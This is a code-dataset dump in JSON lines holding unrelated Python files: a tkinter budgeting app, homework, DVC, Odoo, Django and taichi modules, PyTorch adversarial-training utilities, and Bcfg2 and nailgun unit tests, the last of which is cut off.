Button calls 'log_in' function.\r\n tk.Button(win, text=\"Login\", bg=\"green\",activebackground=\"green\", command=log_in).grid(row=5, column=2, sticky=\"nsew\")\r\n\r\n # ----- Set column & row weights -----\r\n\r\n # Set column and row weights. There are 5 columns and 6 rows (0..4 and 0..5 respectively)\r\n win.columnconfigure(0, weight=1)\r\n win.columnconfigure(1, weight=1)\r\n win.columnconfigure(2, weight=1)\r\n win.columnconfigure(3, weight=1)\r\n win.rowconfigure(0, weight=1)\r\n win.rowconfigure(2, weight=1)\r\n win.rowconfigure(3, weight=1)\r\n win.rowconfigure(4, weight=1)\r\n win.rowconfigure(5, weight=1)\r\n\r\ndef create_user_screen():\r\n '''Function to create the user screen.'''\r\n global amount_text\r\n global amount_label\r\n global transaction_text_widget\r\n global balance_var\r\n global entry_type\r\n \r\n # ----- Row 0 -----\r\n\r\n # FedUni Money Manager label here. Font size should be 22.\r\n tk.Label(win, text=\" Money Manager\", font=\"none 22\").grid(row=0, column=0, sticky='nsew', columnspan=4)\r\n\r\n # ----- Row 1 -----\r\n\r\n # User number label here\r\n user_label = \"User Number: \"+str(user_number_var.get())\r\n tk.Label(win, text=user_label, height=4, width=28).grid(row=1, column=0, sticky='nsew')\r\n\r\n # Balance label here\r\n balance_label.grid(row=1, column=1, sticky='nsew')\r\n\r\n # Log out button here\r\n tk.Button(win, text=\"Log Out\", command=save_and_log_out).grid(row=1, column=2, sticky=\"nsew\", columnspan=2)\r\n\r\n # ----- Row 2 -----\r\n\r\n # Amount label here\r\n tk.Label(win, text=\"Amount($)\").grid(row=2, column=0, sticky='nsew')\r\n\r\n # Amount entry here\r\n amount_entry.grid(row=2, column=1, sticky='nsew')\r\n\r\n # Deposit button here\r\n tk.Button(win, text=\"Deposit\", command=perform_deposit, width=12).grid(row=2, column=2, sticky=\"nsew\")\r\n\r\n # NOTE: Bind Deposit and Withdraw buttons via the command attribute to the relevant deposit and withdraw\r\n # functions in this file. If we \"BIND\" these buttons then the button being pressed keeps looking as\r\n # if it is still pressed if an exception is raised during the deposit or withdraw operation, which is\r\n # offputting.\r\n \r\n \r\n # ----- Row 3 -----\r\n # Entry type label here\r\n tk.Label(win, text=\"Entry Type\").grid(row=3, column=0, sticky='nsew')\r\n\r\n # Entry drop list here\r\n l = ['food', 'rent', 'bills', 'entertainment', 'other']\r\n drop = tk.OptionMenu(win,entry_type, *l)\r\n drop.grid(row=3, column=1, sticky=\"nsew\")\r\n\r\n # Add entry button here\r\n tk.Button(win, text=\"Add Entry\", command=perform_transaction, width=12).grid(row=3, column=2, sticky=\"nsew\")\r\n\r\n # ----- Row 4 -----\r\n\r\n # Declare scrollbar (text_scrollbar) here (BEFORE transaction text widget)\r\n text_scrollbar = tk.Scrollbar(win)\r\n text_scrollbar.grid(row=4, column=1, columnspan=5, sticky='nse')\r\n\r\n # Add transaction Text widget and configure to be in 'disabled' mode so it cannot be edited.\r\n # Note: Set the yscrollcommand to be 'text_scrollbar.set' here so that it actually scrolls the Text widget\r\n # Note: When updating the transaction text widget it must be set back to 'normal mode' (i.e. 
state='normal') for it to be edited\r\n transaction_text_widget['wrap'] = tk.NONE\r\n transaction_text_widget['bd'] = 0\r\n transaction_text_widget['state'] = 'disabled'\r\n transaction_text_widget['yscrollcommand'] = text_scrollbar.set\r\n transaction_text_widget.grid(row=4, column=0, columnspan=5, sticky='nsew')\r\n\r\n # Now add the scrollbar and set it to change with the yview of the text widget\r\n text_scrollbar.config(command=transaction_text_widget.yview)\r\n\r\n transaction_text_widget['state'] = 'normal'\r\n transaction_text_widget.delete(0.0, tk.END)\r\n transaction_text_widget.insert(tk.END, user.get_transaction_string())\r\n transaction_text_widget['state'] = 'disabled'\r\n # ----- Row 5 - Graph -----\r\n\r\n # Call plot_interest_graph() here to display the graph\r\n plot_spending_graph()\r\n\r\n # ----- Set column & row weights -----\r\n\r\n # Set column and row weights here - there are 6 rows and 5 columns (numbered 0 through 4 not 1 through 5!)\r\n win.columnconfigure(0, weight=1)\r\n win.columnconfigure(1, weight=1)\r\n win.columnconfigure(2, weight=1)\r\n win.columnconfigure(3, weight=1)\r\n win.rowconfigure(0, weight=1)\r\n win.rowconfigure(2, weight=1)\r\n win.rowconfigure(3, weight=1)\r\n win.rowconfigure(4, weight=1)\r\n win.rowconfigure(5, weight=1)\r\n\r\n\r\n\r\n# ---------- Display Login Screen & Start Main loop ----------\r\n\r\ncreate_login_screen()\r\nwin.mainloop()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95140041","text":"# 6.3\n\ndef main():\n test = testPalidrone\n print(testPalidrone)\n\ndef reverse(n):\n \"\"\"\n takes in a single number\n converts number to a string\n return reverse the string\n \"\"\"\n n_converted = str(n)\n reverse_num = \"\"\n\n for num in n_converted[::-1]:\n reverse_num = reverse_num + num\n\n return reverse_num\n\n\ndef isPalidrone(n):\n \"\"\"\n compare the number that is passed in to the function call of reverse\n return true or false\n \"\"\"\n\n # compare the two strings to one another\n if str(n) == reverse(n):\n return True\n else:\n return False\n\ndef testPalidrone():\n \"\"\"\n User input\n return: true or false depending on if user input palidrone\n \"\"\"\n\n flag = True\n while flag == True:\n try:\n user_input = int(input((\"Enter a number to check if it is a palidrone: \")))\n\n return isPalidrone(user_input)\n\n flag = False\n\n except ValueError as e:\n print(\"Please insert only 1 integer\")\n print(e)\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fanonxr@bu.edu_hw_6.3.py","file_name":"fanonxr@bu.edu_hw_6.3.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165629988","text":"import os\n\nfrom dvc.command.common.base import CmdBase\nfrom dvc.data_cloud import file_md5\nfrom dvc.exceptions import DvcException\nfrom dvc.logger import Logger\nfrom dvc.state_file import StateFile\nfrom dvc.executor import Executor\n\n\nclass RunError(DvcException):\n def __init__(self, msg):\n DvcException.__init__(self, 'Run error: {}'.format(msg))\n\n\nclass CmdRun(CmdBase):\n def __init__(self, settings):\n super(CmdRun, self).__init__(settings)\n\n def run(self):\n cmd = ' '.join(self.parsed_args.command)\n state = StateFile(data_item=None,\n cmd=cmd,\n out=self.parsed_args.out,\n out_git=self.parsed_args.out_git,\n deps=self.parsed_args.deps,\n 
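The palindrome exercise above builds the reversed string character by character; Python's slice syntax makes both helpers one-liners (and note the conventional spelling is "palindrome"). A minimal equivalent:

def is_palindrome(n):
    s = str(n)
    return s == s[::-1]  # a palindrome equals its own reverse

print(is_palindrome(12321), is_palindrome(1232))  # True False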
locked=self.parsed_args.lock,\n md5=None)\n\n self.run_command(self.settings, state)\n return self.commit_if_needed('DVC run: {}'.format(state.cmd))\n\n @staticmethod\n def run_command(settings, state):\n Executor.exec_cmd_only_success(state.cmd, shell=True)\n\n CmdRun.apply_to_files(state.out, state, CmdRun._create_cache_and_state_files, settings)\n CmdRun.apply_to_files(state.out_git, state, CmdRun._create_state_file, settings)\n\n @staticmethod\n def apply_to_files(files, state, func, settings):\n items = settings.path_factory.to_data_items(files)[0]\n [func(i, state, settings) for i in items]\n\n @staticmethod\n def _create_cache_and_state_files(data_item, state, settings):\n Logger.debug('Move output file \"{}\" to cache dir \"{}\" and create a hardlink'.format(\n data_item.data.relative, data_item.cache_dir_abs))\n data_item.move_data_to_cache()\n return CmdRun._create_state_file(data_item, state, settings, cache_file_exists = True)\n\n @staticmethod\n def _create_state_file(data_item, state, settings, cache_file_exists=False):\n Logger.debug('Create state file \"{}\"'.format(data_item.state.relative))\n\n if cache_file_exists:\n md5 = os.path.basename(data_item.cache.relative)\n else:\n md5 = file_md5(data_item.data.relative)[0]\n\n state_file = StateFile(data_item,\n state.cmd,\n state.out,\n state.out_git,\n locked=state.locked,\n deps=StateFile.parse_deps_state(settings, state.deps),\n md5=md5)\n state_file.save()\n return state_file\n","sub_path":"dvc/command/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"206724267","text":"from datetime import datetime, timedelta\nfrom odoo.tools.misc import DEFAULT_SERVER_DATE_FORMAT\n\nfrom odoo import models, fields, api, _, tools\nfrom odoo.exceptions import UserError\nimport openerp.addons.decimal_precision as dp\nimport logging\n\nimport io\nfrom io import BytesIO\n\nimport xlsxwriter\nimport shutil\nimport base64\nimport csv\nimport xlwt\nimport xml.etree.ElementTree as ET\n\nclass LibroComprasModelo(models.Model):\n _name = \"libro.diario.wizard.pdf\"\n\n fecha_desde=fields.Date()\n fecha_hasta=fields.Date()\n account_id=fields.Many2one('account.account')\n name=fields.Char()\n total_deber=fields.Float()\n total_haber=fields.Float()\n\n def float_format(self,valor):\n #valor=self.base_tax\n if valor:\n result = '{:,.2f}'.format(valor)\n result = result.replace(',','*')\n result = result.replace('.',',')\n result = result.replace('*','.')\n else:\n result=\"0,00\"\n return result\n\nclass WizardReport_1(models.TransientModel): # aqui declaro las variables del wizar que se usaran para el filtro del pdf\n _name = 'wizard.libro.diario'\n _description = \"Libro Diario\"\n\n date_from = fields.Date('Date From', default=lambda *a:(datetime.now() - timedelta(days=(1))).strftime('%Y-%m-%d'))\n date_to = fields.Date(string='Date To', default=lambda *a:datetime.now().strftime('%Y-%m-%d'))\n\n company_id = fields.Many2one('res.company','Company',default=lambda self: self.env.user.company_id.id)\n line = fields.Many2many(comodel_name='libro.diario.wizard.pdf', string='Lineas')\n\n def rif(self,aux):\n #nro_doc=self.partner_id.vat\n busca_partner = self.env['res.partner'].search([('id','=',aux)])\n for det in busca_partner:\n #tipo_doc=busca_partner.nationality\n nro_doc=str(busca_partner.vat)\n return nro_doc\n\n def periodo(self,date):\n fecha = str(date)\n fecha_aux=fecha\n mes=fecha[5:7] \n resultado=mes\n return 
resultado\n\n def formato_fecha(self,date):\n fecha = str(date)\n fecha_aux=fecha\n ano=fecha_aux[0:4]\n mes=fecha[5:7]\n dia=fecha[8:10] \n resultado=dia+\"/\"+mes+\"/\"+ano\n return resultado\n\n def float_format2(self,valor):\n #valor=self.base_tax\n if valor:\n result = '{:,.2f}'.format(valor)\n result = result.replace(',','*')\n result = result.replace('.',',')\n result = result.replace('*','.')\n else:\n result=\"0,00\"\n return result\n\n\n\n def print_libro_diario(self):\n \tt=self.env['libro.diario.wizard.pdf'].search([])\n \tw=self.env['wizard.libro.diario'].search([('id','!=',self.id)])\n \tt.unlink()\n \tw.unlink()\n \tcur_account=self.env['account.account'].search([],order=\"code asc\")\n \tfor det_account in cur_account:\n \t\tacum_deber=0\n \t\tacum_haber=0\n \t\tcursor = self.env['account.move.line'].search([('date', '>=', self.date_from),('date','<=',self.date_to),('account_id','=',det_account.id),('parent_state','=','posted')])\n \t\t\"\"\"if cursor:\n \t\t\traise UserError(_('cursor = %s')%cursor)\"\"\"\n \t\tif cursor:\n \t\t\tfor det in cursor:\n \t\t\t\tacum_deber=acum_deber+det.debit\n \t\t\t\tacum_haber=acum_haber+det.credit\n \t\t\t#raise UserError(_('lista_mov_line = %s')%acum_deber)\n \t\t\tvalues=({\n \t\t\t\t'account_id':det_account.id,\n \t\t\t\t'total_deber':acum_deber,\n \t\t\t\t'total_haber':acum_haber,\n \t\t\t\t'name':det_account.name,\n \t\t\t\t'fecha_desde':self.date_from,\n \t\t\t\t'fecha_hasta':self.date_to,\n \t\t\t\t})\n \t\t\tdiario_id = t.create(values)\n \tself.line=self.env['libro.diario.wizard.pdf'].search([])\n \treturn {'type': 'ir.actions.report','report_name': 'l10n_ve_libro_diario.reporte_libro_diario','report_type':\"qweb-pdf\"}\n \t#raise UserError(_('lista_mov_line = %s')%self.line)\n","sub_path":"l10n_ve_libro_diario/wizard/wizard.py","file_name":"wizard.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"337839422","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\nfrom caixa.models import Despesa, Receita, Saldo\n\nfrom users.forms import PerfilForm\n\n\n@login_required\ndef index(request):\n despesas = Despesa.objects.all().order_by(\"-id\")[:5]\n receitas = Receita.objects.all().order_by(\"-id\")[:5]\n saldo = Saldo.objects.all().order_by(\"-id\")\n user_form = PerfilForm(instance=request.user)\n return render(\n request,\n \"index.html\",\n context={\n \"user\": request.user,\n \"user_form\": user_form,\n \"despesas\": despesas,\n \"receitas\": receitas,\n \"saldo\": saldo,\n },\n )\n","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386423381","text":"import datetime\nimport os\nimport sys\n\nfrom membound import Membound\nfrom taichi.core import ti_core as _ti_core\n\nimport taichi as ti\n\ntest_suites = [Membound]\ntest_archs = [ti.cuda]\n\n\nclass PerformanceMonitoring:\n suites = []\n\n def __init__(self):\n for s in test_suites:\n self.suites.append(s())\n\n def run(self):\n print(\"Running...\")\n for s in self.suites:\n s.run()\n\n def store_to_path(self, path_with_file_name='./performance_result.md'):\n with open(path_with_file_name, 'w') as f:\n for arch in test_archs:\n for s in self.suites:\n lines = s.mdlines(arch)\n for line in lines:\n print(line, file=f)\n\n def store_with_date_and_commit_id(self, file_dir='./'):\n 
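float_format and float_format2 in the report record above localize numbers by formatting with US separators and then swapping them through a `*` placeholder so the two replacements do not collide. The same trick as a compact standalone function:

def float_format(value):
    # 1234567.5 -> '1.234.567,50' (thousands '.', decimal ',')
    if not value:
        return "0,00"
    return ("{:,.2f}".format(value)
            .replace(",", "*").replace(".", ",").replace("*", "."))

print(float_format(1234567.5))  # 1.234.567,50
print(float_format(None))       # 0,00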
current_time = datetime.datetime.now().strftime(\"%Y%m%dd%Hh%Mm%Ss\")\n commit_hash = _ti_core.get_commit_hash()[:8]\n file_name = f'perfresult_{current_time}_{commit_hash}.md'\n path = os.path.join(file_dir, file_name)\n print('Storing benchmark result to: ' + path)\n self.store_to_path(path)\n\n\ndef main():\n file_dir = sys.argv[1] if len(sys.argv) > 1 else './'\n p = PerformanceMonitoring()\n p.run()\n p.store_to_path() # for /benchmark\n p.store_with_date_and_commit_id(file_dir) #for postsubmit\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"benchmarks/misc/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450986633","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.optim as optim\n\n\ndef squared_l2_norm(x):\n flattened = x.view(x.unsqueeze(0).shape[0], -1)\n return (flattened ** 2).sum(1)\n\n\ndef l2_norm(x):\n return squared_l2_norm(x).sqrt()\n\n\ndef pgd_whitebox(\n model,\n x,\n y,\n device,\n epsilon,\n num_steps,\n step_size,\n clip_min,\n clip_max,\n is_random=True,\n distance=\"linf\",\n):\n assert distance in [\"linf\", \"l2\"]\n\n if distance == \"linf\":\n if is_random:\n random_noise = (\n torch.FloatTensor(x.shape)\n .uniform_(-epsilon, epsilon)\n .to(device)\n .detach()\n )\n x_pgd = Variable(x.detach().data + random_noise, requires_grad=True)\n for _ in range(num_steps):\n with torch.enable_grad():\n loss = nn.CrossEntropyLoss()(model(x_pgd), y)\n loss.backward()\n x_pgd.data = x_pgd.data + step_size * x_pgd.grad.data.sign()\n eta = torch.clamp(x_pgd.data - x.data, -epsilon, epsilon)\n x_pgd.data = torch.clamp(x.data + eta, clip_min, clip_max)\n x_pgd.grad.data = torch.zeros_like(\n x_pgd.grad.data\n ) # zero out accumulated gradients\n\n if distance == \"l2\":\n if is_random:\n random_noise = (\n torch.FloatTensor(x.shape).uniform_(-1, 1).to(device).detach()\n )\n random_noise.renorm_(p=2, dim=0, maxnorm=epsilon)\n x_pgd = Variable(x.detach().clone() + random_noise, requires_grad=True)\n for _ in range(num_steps):\n with torch.enable_grad():\n loss = nn.CrossEntropyLoss()(model(x_pgd), y)\n loss.backward()\n # renorming gradient\n grad_norms = x_pgd.grad.view(len(x), -1).norm(p=2, dim=1)\n x_pgd.grad.div_(grad_norms.view(-1, 1, 1, 1))\n # avoid nan or inf if gradient is 0\n if (grad_norms == 0).any():\n x_pgd.grad[grad_norms == 0] = torch.randn_like(\n x_pgd.grad[grad_norms == 0]\n )\n # optimizer_delta.step()\n x_pgd.data += step_size * x_pgd.grad.data\n eta = x_pgd.data - x.data\n eta.renorm_(p=2, dim=0, maxnorm=epsilon)\n x_pgd.data = torch.clamp(x.data + eta, clip_min, clip_max)\n x_pgd.grad.data = torch.zeros_like(\n x_pgd.grad.data\n ) # zero out accumulated gradients\n return x_pgd\n\n\n# ref: https://github.com/yaodongyu/TRADES\ndef trades_loss(\n model,\n x_natural,\n y,\n device,\n optimizer,\n step_size,\n epsilon,\n perturb_steps,\n beta,\n clip_min,\n clip_max,\n distance=\"linf\",\n natural_criterion=nn.CrossEntropyLoss(),\n):\n # define KL-loss\n criterion_kl = nn.KLDivLoss(size_average=False)\n model.eval()\n batch_size = len(x_natural)\n # generate adversarial example\n x_adv = (\n x_natural.detach() + 0.001 * torch.randn(x_natural.shape).to(device).detach()\n )\n if distance == \"linf\":\n for _ in range(perturb_steps):\n x_adv.requires_grad_()\n with torch.enable_grad():\n loss_kl = criterion_kl(\n 
F.log_softmax(model(x_adv), dim=1),\n F.softmax(model(x_natural), dim=1),\n )\n grad = torch.autograd.grad(loss_kl, [x_adv])[0]\n x_adv = x_adv.detach() + step_size * torch.sign(grad.detach())\n x_adv = torch.min(\n torch.max(x_adv, x_natural - epsilon), x_natural + epsilon\n )\n x_adv = torch.clamp(x_adv, clip_min, clip_max)\n elif distance == \"l2\":\n delta = 0.001 * torch.randn(x_natural.shape).to(device).detach()\n delta = Variable(delta.data, requires_grad=True)\n\n # Setup optimizers\n optimizer_delta = optim.SGD([delta], lr=epsilon / perturb_steps * 2)\n\n for _ in range(perturb_steps):\n adv = x_natural + delta\n\n # optimize\n optimizer_delta.zero_grad()\n with torch.enable_grad():\n loss = (-1) * criterion_kl(\n F.log_softmax(model(adv), dim=1), F.softmax(model(x_natural), dim=1)\n )\n loss.backward()\n # renorming gradient\n grad_norms = delta.grad.view(batch_size, -1).norm(p=2, dim=1)\n delta.grad.div_(grad_norms.view(-1, 1, 1, 1))\n # avoid nan or inf if gradient is 0\n if (grad_norms == 0).any():\n delta.grad[grad_norms == 0] = torch.randn_like(\n delta.grad[grad_norms == 0]\n )\n optimizer_delta.step()\n\n # projection\n delta.data.add_(x_natural)\n delta.data.clamp_(clip_min, clip_max).sub_(x_natural)\n delta.data.renorm_(p=2, dim=0, maxnorm=epsilon)\n x_adv = Variable(x_natural + delta, requires_grad=False)\n else:\n x_adv = torch.clamp(x_adv, clip_min, clip_max)\n model.train()\n\n x_adv = Variable(torch.clamp(x_adv, clip_min, clip_max), requires_grad=False)\n # zero gradient\n optimizer.zero_grad()\n # calculate robust loss\n logits, logits_adv = model(x_natural), model(x_adv)\n loss_natural = natural_criterion(logits, y)\n loss_robust = (1.0 / batch_size) * criterion_kl(\n F.log_softmax(logits_adv, dim=1), F.softmax(logits, dim=1)\n )\n loss = loss_natural + beta * loss_robust\n return loss, logits, logits_adv\n","sub_path":"utils_adv.py","file_name":"utils_adv.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233635703","text":"import os\nimport sys\nimport lxml.etree\nimport Bcfg2.Server.Plugin\nfrom mock import Mock, MagicMock, patch\nfrom Bcfg2.Server.Plugins.Rules import *\n\n# add all parent testsuite directories to sys.path to allow (most)\n# relative imports in python 2.4\npath = os.path.dirname(__file__)\nwhile path != \"/\":\n if os.path.basename(path).lower().startswith(\"test\"):\n sys.path.append(path)\n if os.path.basename(path) == \"testsuite\":\n break\n path = os.path.dirname(path)\nfrom common import *\nfrom TestPlugin import TestPrioDir\n\n\nclass TestRules(TestPrioDir):\n test_obj = Rules\n\n def test_HandlesEntry(self):\n r = self.get_obj()\n r.Entries = dict(Path={\"/etc/foo.conf\": Mock(),\n \"/etc/bar.conf\": Mock()})\n r._matches = Mock()\n metadata = Mock()\n\n entry = lxml.etree.Element(\"Path\", name=\"/etc/foo.conf\")\n self.assertEqual(r.HandlesEntry(entry, metadata),\n r._matches.return_value)\n r._matches.assert_called_with(entry, metadata,\n r.Entries['Path'].keys())\n\n r._matches.reset_mock()\n entry = lxml.etree.Element(\"Path\", name=\"/etc/baz.conf\")\n self.assertEqual(r.HandlesEntry(entry, metadata),\n r._matches.return_value)\n r._matches.assert_called_with(entry, metadata,\n r.Entries['Path'].keys())\n\n r._matches.reset_mock()\n entry = lxml.etree.Element(\"Package\", name=\"foo\")\n self.assertFalse(r.HandlesEntry(entry, metadata))\n\n def test_BindEntry(self, method=\"BindEntry\"):\n r = self.get_obj()\n r.get_attrs = Mock()\n 
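A minimal, hypothetical usage sketch for trades_loss above: the toy model and random batch exist only to make the call shapes concrete, and the epsilon/step-size values are the common 8/255 and 2/255 CIFAR-style choices, not anything this file mandates.

import torch
import torch.nn as nn
import torch.optim as optim

model = nn.Sequential(nn.Flatten(), nn.Linear(3 * 32 * 32, 10))
optimizer = optim.SGD(model.parameters(), lr=0.1)
x = torch.rand(8, 3, 32, 32)    # inputs already scaled to [0, 1]
y = torch.randint(0, 10, (8,))

loss, logits, logits_adv = trades_loss(
    model, x, y, device="cpu", optimizer=optimizer,
    step_size=2 / 255, epsilon=8 / 255, perturb_steps=10,
    beta=6.0, clip_min=0.0, clip_max=1.0, distance="linf",
)
loss.backward()   # trades_loss zeroes gradients internally before returning
optimizer.step()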
r.get_attrs.return_value = dict(overwrite=\"new\", add=\"add\",\n text=\"text\")\n entry = lxml.etree.Element(\"Test\", overwrite=\"old\", keep=\"keep\")\n metadata = Mock()\n\n getattr(r, method)(entry, metadata)\n r.get_attrs.assert_called_with(entry, metadata)\n self.assertItemsEqual(entry.attrib,\n dict(overwrite=\"old\", add=\"add\", keep=\"keep\",\n text=\"text\"))\n\n def test_HandleEntry(self):\n self.test_BindEntry(method=\"HandleEntry\")\n\n @patch(\"Bcfg2.Server.Plugin.PrioDir._matches\")\n def test__matches(self, mock_matches):\n \"\"\" test _matches() behavior regardless of state of _regex_enabled \"\"\"\n r = self.get_obj()\n metadata = Mock()\n\n entry = lxml.etree.Element(\"Path\", name=\"/etc/foo.conf\")\n rules = []\n mock_matches.return_value = True\n self.assertTrue(r._matches(entry, metadata, rules))\n mock_matches.assert_called_with(r, entry, metadata, rules)\n\n # test special Path cases -- adding and removing trailing slash\n mock_matches.reset_mock()\n mock_matches.return_value = False\n rules = [\"/etc/foo/\", \"/etc/bar\"]\n entry = lxml.etree.Element(\"Path\", name=\"/etc/foo\")\n self.assertTrue(r._matches(entry, metadata, rules))\n mock_matches.assert_called_with(r, entry, metadata, rules)\n\n mock_matches.reset_mock()\n entry = lxml.etree.Element(\"Path\", name=\"/etc/bar/\")\n self.assertTrue(r._matches(entry, metadata, rules))\n mock_matches.assert_called_with(r, entry, metadata, rules)\n\n @patch(\"Bcfg2.Server.Plugin.PrioDir._matches\")\n def test__matches_regex_disabled(self, mock_matches):\n \"\"\" test failure to match with regex disabled \"\"\"\n r = self.get_obj()\n self.set_regex_enabled(r, False)\n metadata = Mock()\n mock_matches.return_value = False\n\n entry = lxml.etree.Element(\"Path\", name=\"/etc/foo.conf\")\n rules = []\n self.assertFalse(r._matches(entry, metadata, rules))\n mock_matches.assert_called_with(r, entry, metadata, rules)\n\n @patch(\"Bcfg2.Server.Plugin.PrioDir._matches\")\n def test__matches_regex_enabled(self, mock_matches):\n \"\"\" test match with regex enabled \"\"\"\n r = self.get_obj()\n self.set_regex_enabled(r, True)\n metadata = Mock()\n mock_matches.return_value = False\n\n entry = lxml.etree.Element(\"Path\", name=\"/etc/foo.conf\")\n rules = [\"/etc/.*\\.conf\", \"/etc/bar\"]\n self.assertTrue(r._matches(entry, metadata, rules))\n mock_matches.assert_called_with(r, entry, metadata, rules)\n self.assertIn(\"/etc/.*\\.conf\", r._regex_cache.keys())\n\n def set_regex_enabled(self, rules_obj, state):\n \"\"\" set the state of regex_enabled for this implementation of\n Rules \"\"\"\n if not isinstance(rules_obj.core.setup, MagicMock):\n rules_obj.core.setup = MagicMock()\n rules_obj.core.setup.cfp.getboolean.return_value = state\n\n def test__regex_enabled(self):\n r = self.get_obj()\n r.core.setup = MagicMock()\n self.assertEqual(r._regex_enabled,\n r.core.setup.cfp.getboolean.return_value)\n r.core.setup.cfp.getboolean.assert_called_with(\"rules\", \"regex\",\n default=False)\n","sub_path":"testsuite/Testsrc/Testlib/TestServer/TestPlugins/TestRules.py","file_name":"TestRules.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"516744799","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
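The Rules tests above lean heavily on mock's patch decorator; the suite imports the standalone mock backport, but the pattern is identical with the stdlib unittest.mock. A self-contained sketch with a throwaway class:

from unittest.mock import patch

class Greeter:
    def greet(self):
        return "hello"

# patch.object swaps the attribute out for a MagicMock for the duration of
# the block and hands that mock to the body for assertions.
with patch.object(Greeter, "greet", return_value="mocked") as mock_greet:
    assert Greeter().greet() == "mocked"
    mock_greet.assert_called_once_with()

assert Greeter().greet() == "hello"  # original restored on exit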
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport copy\n\nimport six\n\nfrom nailgun.policy import cpu_distribution\nfrom nailgun.test import base\n\n\nclass TestCpuDistributor(base.BaseTestCase):\n\n def test_cpu_distributor(self):\n component = {'name': 'test_name',\n 'required_cpus': 5}\n distributor = cpu_distribution.CpuDistributor(component)\n self.assertEquals(component['name'], distributor.name)\n self.assertEquals(component['required_cpus'], distributor.required)\n self.assertEquals(0, len(distributor.cpus))\n\n def test_consume(self):\n component = {'name': 'test_name',\n 'required_cpus': 2}\n distributor = cpu_distribution.CpuDistributor(component)\n cpus = [0, 1, 2, 3]\n self.assertFalse(distributor.consume(cpus))\n self.assertEquals([0, 1], distributor.cpus)\n self.assertEquals([2, 3], cpus)\n self.assertEquals(0, distributor.required)\n\n def test_consume_limit(self):\n component = {'name': 'test_name',\n 'required_cpus': 4}\n distributor = cpu_distribution.CpuDistributor(component)\n cpus = [0, 1, 2, 3]\n self.assertTrue(distributor.consume(cpus, 1))\n self.assertEqual([0], distributor.cpus)\n self.assertEqual([1, 2, 3], cpus)\n self.assertEqual(3, distributor.required)\n\n def test_consume_few_cpus(self):\n component = {'name': 'test_name',\n 'required_cpus': 5}\n distributor = cpu_distribution.CpuDistributor(component)\n cpus = [0, 1]\n self.assertTrue(distributor.consume(cpus))\n self.assertEqual([0, 1], distributor.cpus)\n self.assertEqual([], cpus)\n self.assertEqual(3, distributor.required)\n\n\nclass TestGroupCpuDistributor(base.BaseTestCase):\n\n def _create_group_distributor(self, *required_cpus):\n components = []\n for idx, required in enumerate(required_cpus):\n components.append({'name': 'comp{0}'.format(idx),\n 'required_cpus': required})\n return cpu_distribution.GroupCpuDistributor(components)\n\n def test_group_cpu_distributor(self):\n required_cpus = [1, 2, 3, 4]\n distributor = self._create_group_distributor(*required_cpus)\n self.assertEquals(10, distributor.total_required)\n self.assertEquals(4, len(distributor.components))\n for required, component in six.moves.zip(\n required_cpus, distributor.components):\n self.assertEquals(required, component.required)\n\n def test_consume(self):\n required_cpus = [1, 2, 2]\n distributor = self._create_group_distributor(*required_cpus)\n cpus = [0, 1, 2, 3, 4]\n\n self.assertFalse(distributor.consume(cpus))\n self.assertEquals([], cpus)\n self.assertEquals(0, distributor.total_required)\n\n expected = [\n [0],\n [1, 2],\n [3, 4]]\n for cpus, component in zip(expected, distributor.components):\n self.assertEquals(cpus, component.cpus)\n\n\nclass TestDistributeNodeCPUs(base.BaseTestCase):\n\n def test_many_cpus_required(self):\n numa_nodes = [\n {'cpus': [0, 1, 2, 3]},\n {'cpus': [4, 5, 6, 7]}]\n components = [\n {'name': 'nova',\n 'required_cpus': 5},\n {'name': 'dpdk',\n 'required_cpus': 2}]\n expected_data = {\n 'components': {\n 'nova': [1, 2, 3, 5, 6],\n 'dpdk': [0, 4]\n },\n 'isolated_cpus': [0, 1, 2, 3, 4, 5, 6]\n }\n saved_numa_nodes = copy.deepcopy(numa_nodes)\n self.assertEquals(\n expected_data,\n 
